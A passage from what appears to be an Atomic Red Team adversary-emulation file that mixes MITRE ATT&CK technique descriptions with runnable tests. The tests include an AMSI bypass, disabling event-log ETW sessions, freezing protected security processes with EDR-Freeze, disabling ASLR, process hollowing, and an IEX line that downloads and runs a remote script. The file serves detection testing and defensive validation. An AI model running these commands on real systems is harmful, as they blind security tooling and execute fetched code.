Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"
name: powershell
elevation_required: true
- name: AMSI Bypass - Create AMSIEnable Reg Key
auto_generated_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0
description: |
Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
supported_platforms:
- windows
executor:
command: |
New-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Value 0 -PropertyType DWORD -Force | Out-Null
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings"
-Recurse -Force 2> $null
'
name: powershell
elevation_required: true
- name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
description: This atomic simulates an activity where an attacker disables the
EventLog-Application ETW Auto Logger session using the reg.exe utility to
update the Windows registry value "Start". This would effectivly disable the
Event log application channel. The changes would only take effect after a
restart.
supported_platforms:
- windows
executor:
command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
/v "Start" /t REG_DWORD /d "0" /f
cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
/v "Start" /t REG_DWORD /d "1" /f
name: command_prompt
elevation_required: true
- name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
description: This atomic simulates an activity where an attacker disables the
EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty"
cmdlet to update the Windows registry value "Start". This would effectivly
disable the Event log application channel. The changes would only take effect
after a restart.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
-Name Start -Value 0 -PropertyType "DWord" -Force
cleanup_command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
-Name Start -Value 1 -PropertyType "DWord" -Force
name: powershell
elevation_required: true
- name: Disable EventLog-Application ETW Provider Via Registry - Cmd
auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
description: This atomic simulates an activity where an attacker disables a
specific ETW provider from the EventLog-Application ETW Auto Logger session
using the reg.exe utility to update the Windows registry value "Enabled".
This would effectivly remove that provider from the session and cause to not
emit any logs of that type. The changes would only take effect after a restart.
supported_platforms:
- windows
input_arguments:
ETWProviderGUID:
type: string
default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
description: Microsoft-Windows-SenseIR ETW Provider GUID
executor:
command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
/v "Enabled" /t REG_DWORD /d "0" /f
cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
/v "Enabled" /t REG_DWORD /d "1" /f
name: command_prompt
elevation_required: true
- name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
description: This atomic simulates an activity where an attacker disables a
specific ETW provider from the EventLog-Application ETW Auto Logger session
using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry
value "Enabled". This would effectivly remove that provider from the session
and cause to not emit any logs of that type. The changes would only take effect
after a restart.
supported_platforms:
- windows
input_arguments:
ETWProviderGUID:
type: string
default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
description: Microsoft-Windows-SenseIR ETW Provider GUID
executor:
command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
-Name Enabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
-Name Enabled -Value 1 -PropertyType "DWord" -Force
name: powershell
elevation_required: true
- name: Freeze PPL-protected process with EDR-Freeze
auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
description: This test utilizes the tool EDR-Freeze, which leverages the native
Microsoft binary WerFaultSecure.exe to suspend processes protected by the
Protected Process Light mechanism. PPL is a Windows security feature designed
to safeguard critical system processes — such as those related to antivirus,
credential protection, and system integrity — from tampering or inspection.
These processes operate in a restricted environment that prevents access even
from administrators or debugging tools, unless the accessing tool is signed
and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently
trusted by the operating system, EDR-Freeze is able to bypass these restrictions
and temporarily freeze PPL-protected processes for analysis or testing purposes.
supported_platforms:
- windows
input_arguments:
processName:
type: string
default: SecurityHealthService
description: PPL-protected process name to target
executor:
command: "# Enable SeDebugPrivilege\nAdd-Type -TypeDefinition @\"\nusing System;\nusing
System.Runtime.InteropServices;\n\npublic class TokenAdjuster {\n [DllImport(\"advapi32.dll\",
SetLastError = true)]\n public static extern bool OpenProcessToken(IntPtr
ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);\n\n [DllImport(\"advapi32.dll\",
SetLastError = true)]\n public static extern bool LookupPrivilegeValue(string
lpSystemName, string lpName, out long lpLuid);\n\n [DllImport(\"advapi32.dll\",
SetLastError = true)]\n public static extern bool AdjustTokenPrivileges(IntPtr
TokenHandle, bool DisableAllPrivileges,\n ref TOKEN_PRIVILEGES NewState,
uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);\n\n [StructLayout(LayoutKind.Sequential,
Pack = 1)]\n public struct TOKEN_PRIVILEGES {\n public int PrivilegeCount;\n
\ public long Luid;\n public int Attributes;\n }\n\n public
const int SE_PRIVILEGE_ENABLED = 0x00000002;\n public const uint TOKEN_ADJUST_PRIVILEGES
= 0x0020;\n public const uint TOKEN_QUERY = 0x0008;\n\n public static
bool EnableSeDebugPrivilege() {\n IntPtr hToken;\n if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle,
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))\n return
false;\n\n long luid;\n if (!LookupPrivilegeValue(null, \"SeDebugPrivilege\",
out luid))\n return false;\n\n TOKEN_PRIVILEGES tp = new
TOKEN_PRIVILEGES();\n tp.PrivilegeCount = 1;\n tp.Luid = luid;\n
\ tp.Attributes = SE_PRIVILEGE_ENABLED;\n\n return AdjustTokenPrivileges(hToken,
false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);\n }\n}\n\"@\n\n$result =
[TokenAdjuster]::EnableSeDebugPrivilege()\nif ($result) {\n Write-Host
\"SeDebugPrivilege enabled successfully.\" -ForegroundColor Green\n} else
{\n Write-Host \"Failed to enable SeDebugPrivilege.\" -ForegroundColor
Red\n exit 1\n}\n\n# Get basic process info\n$process = Get-Process -Name
$#{processName} -ErrorAction Stop\n$processName = $process.ProcessName\nWrite-Host
\"Process Name: $processName)\"\nWrite-Host \"PID: $($process.Id)\"\n \n#
Get executable path and user info\n$query = \"SELECT * FROM Win32_Process
WHERE Name = '$processName.exe'\"\n$wmiProcess = Get-WmiObject -Query $query\n\n$owner
= $wmiProcess.GetOwner()\n Write-Host \"User: $($owner.Domain)\\$($owner.User)\"\n\n\n#
Get the folder of the current script\n$scriptFolder = Split-Path -Parent
$MyInvocation.MyCommand.Definition\n\n# Download latest EDR-Freeze package
and extract (force replace)\n$downloadUrl = \"https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip\"\n$zipPath
= Join-Path $scriptFolder \"EDR-Freeze_1.0.zip\"\nWrite-Host \"Downloading
latest EDR-Freeze from $downloadUrl\" -ForegroundColor Cyan\ntry {\n Invoke-WebRequest
-Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop\n
\ Write-Host \"Download completed: $zipPath\" -ForegroundColor Green\n
\ $extractFolder = $scriptFolder\n if (Test-Path $zipPath) {\n Write-Host
\"Extracting archive to $extractFolder (overwriting existing files)\" -ForegroundColor
Cyan\n if (Test-Path $extractFolder) {\n # Ensure target
exe not locked; attempt to stop any running instance silently\n Get-Process
-Name \"EDR-Freeze_1.0\" -ErrorAction SilentlyContinue | Stop-Process -Force
-ErrorAction SilentlyContinue\n }\n Add-Type -AssemblyName
System.IO.Compression.FileSystem 2>$null\n # Custom extraction routine
(overwrite existing) compatible with .NET Framework (no bool overwrite overload)\n
\ $archive = $null\n try {\n $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)\n
\ foreach ($entry in $archive.Entries) {\n if ([string]::IsNullOrWhiteSpace($entry.FullName))
{ continue }\n if ($entry.FullName.EndsWith('/')) { # directory
entry\n $dirPath = Join-Path $extractFolder $entry.FullName\n
\ if (-not (Test-Path $dirPath)) { New-Item -ItemType
Directory -Path $dirPath -Force | Out-Null }\n continue\n
\ }\n $destPath = Join-Path $extractFolder
$entry.FullName\n $destDir = Split-Path $destPath -Parent\n
\ if (-not (Test-Path $destDir)) { New-Item -ItemType Directory
-Path $destDir -Force | Out-Null }\n if (Test-Path $destPath)
{ Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }\n try
{\n # Use static extension method (PowerShell 5.1 compatible)\n
\ [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry,
$destPath, $false)\n } catch {\n Write-Host
\"Failed to extract entry $($entry.FullName): $_\" -ForegroundColor Yellow\n
\ }\n }\n Write-Host \"Extraction completed.\"
-ForegroundColor Green\n } finally {\n if ($archive) {
$archive.Dispose() }\n }\n }\n} catch {\n Write-Host \"Failed
to download or extract EDR-Freeze: $_\" -ForegroundColor Red\n}\n\n# Wait
15s before putting targeted process before putting it in the comma\nWrite-Host
\"Waiting 15s before putting $processName in the comma\" -ForegroundColor
Yellow\nStart-Sleep -Seconds 5\nWrite-Host \"Waiting 10s before putting
$processName in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds
5\nWrite-Host \"Waiting 5s before putting $processName in the comma\" -ForegroundColor
Yellow\nStart-Sleep -Seconds 3\nWrite-Host \"Waiting 2s before putting $processName
in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds 2\n\n# Put
targeted process in the comma for 15s\n# Discover the EDR-Freeze executable
dynamically (pick most recent if multiple)\n$edrFreezeExeName = Get-ChildItem
-Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue
|\n Sort-Object LastWriteTime -Descending |\n Select-Object -First
1 -ExpandProperty Name\nif (-not $edrFreezeExeName) {\n Write-Host \"No
EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder\" -ForegroundColor
Red\n exit 1\n}\n\n$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName\nWrite-Host
\"Using EDR-Freeze executable: $edrFreezeExeName\" -ForegroundColor Cyan\nWrite-Host
\"$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)\"
-ForegroundColor Yellow\nStart-Process -FilePath $edrFreezeExe -ArgumentList
(\"$($process.Id) 15000\") | Out-Null"
cleanup_command: |-
Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
Write-Output "File deleted: $edrFreezeExe"
name: powershell
elevation_required: true
- name: Disable ASLR Via sysctl parameters - Linux
auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
which disables Address Space Layout Randomization (ASLR) in Linux.
supported_platforms:
- linux
executor:
command: 'sysctl -w kernel.randomize_va_space=0
'
cleanup_command: 'sysctl -w kernel.randomize_va_space=2
'
name: bash
elevation_required: true
T1601:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754
created: '2020-10-19T19:42:19.740Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1601
external_id: T1601
- source_name: Cisco IOS Software Integrity Assurance - Image File Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Image File Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
- source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:13.730Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1574:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
created: '2020-03-12T20:38:12.465Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574
external_id: T1574
- source_name: Autoruns for Windows
description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96.
Retrieved March 13, 2020.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:13.820Z'
name: Hijack Execution Flow
description: |-
Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.3'
atomic_tests: []
T1036.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--afac5dbc-4383-4fb6-9ba6-45b25d49e530
created: '2025-09-22T20:13:45.616Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/012
external_id: T1036.012
- source_name: Mozilla User Agent
description: MDN contributors. (2025, July 4). User-Agent header. Retrieved
October 19, 2025.
url: https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/User-Agent
- source_name: 'Gummy Browsers: Targeted Browser Spoofing against State-of-the-Art
Fingerprinting Techniques'
description: Zengrui Liu, Prakash Shrestha, and Nitesh Saxena. (2021, October
19). Retrieved September 22, 2025.
url: https://arxiv.org/pdf/2110.10129
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-19T19:41:22.343Z'
name: Browser Fingerprint
description: |-
Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc. The HTTP User-Agent request header is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting user agent.(Citation: Mozilla User Agent)
Adversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers: Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1027.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92
created: '2020-03-19T21:27:32.820Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/005
external_id: T1027.005
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:13.906Z'
name: Indicator Removal from Tools
description: |-
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1078:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
created: '2017-05-31T21:31:00.645Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078
external_id: T1078
- source_name: volexity_0day_sophos_FW
description: 'Adair, S., Lancaster, T., Volexity Threat Research. (2022, June
15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious
Breach. Retrieved July 1, 2022.'
url: https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
- source_name: CISA MFA PrintNightmare
description: Cybersecurity and Infrastructure Security Agency. (2022, March
15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting
Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability.
Retrieved March 16, 2022.
url: https://www.cisa.gov/uscert/ncas/alerts/aa22-074a
- source_name: TechNet Credential Theft
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn535501.aspx
- source_name: TechNet Audit Policy
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:14.095Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
- Sekhar Sarukkai, McAfee
- Jon Sternstein, Stern Security
- Yossi Weizman, Azure Defender Research Team
- Netskope
- Mark Wee
- Praetorian
- Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- ESXi
- IaaS
- Identity Provider
- Linux
- macOS
- Network Devices
- Office Suite
- SaaS
- Windows
x_mitre_version: '2.8'
atomic_tests: []
T1055.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4
created: '2020-01-14T17:21:54.470Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/012
external_id: T1055.012
- source_name: Nviso Spoof Command Line 2020
description: 'Daman, R. (2020, February 4). The return of the spoof part 2:
Command line spoofing. Retrieved November 19, 2021.'
url: https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
2024.
url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:14.559Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
method of executing arbitrary code in the address space of a separate live
process. \n\nProcess hollowing is commonly performed by creating a process
in a suspended state then unmapping/hollowing its memory, which can then be
replaced with malicious code. A victim process can be created with native
Windows API calls such as CreateProcess, which includes a flag
to suspend the processes primary thread. At this point the process can be
unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection
\ before being written to, realigned to the injected code, and resumed via
VirtualAllocEx, WriteProcessMemory, SetThreadContext,
then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation:
Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local
Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new
process rather than targeting an existing process. This behavior will likely
not result in elevated privileges since the injected process was spawned from
(and thus inherits the security context) of the injecting process. However,
execution via process hollowing may also evade detection from security products
since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c
description: |
This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
type: string
default: C:\Windows\System32\cmd.exe
parent_process_name:
description: Name of the parent process
type: string
default: explorer
sponsor_binary_path:
description: Path of the sponsor binary (executable that will host the binary)
type: string
default: C:\Windows\System32\notepad.exe
spawnto_process_name:
description: Name of the process to spawn
type: string
default: notepad
executor:
command: |
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
'
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
name: powershell
- name: Process Hollowing in Go using CreateProcessW WinAPI
auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
description: |
Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
supported_platforms:
- windows
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow
type: string
default: C:\Windows\System32\werfault.exe
hollow_process_name:
description: Name of the process to hollow
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
"#{hollow_binary_path}" -debug
'
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
- name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
description: |
Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
allows for the retrieval of output generated from executed shellcode.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
supported_platforms:
- windows
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow
type: string
default: C:\Windows\System32\werfault.exe
hollow_process_name:
description: Name of the process to hollow
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1564.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb
created: '2021-10-12T20:02:31.866Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/009
external_id: T1564.009
- source_name: tau bundlore erika noerenberg 2020
description: 'Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore
(macOS) mm-install-macos. Retrieved October 12, 2021.'
url: https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html
- source_name: Resource and Data Forks
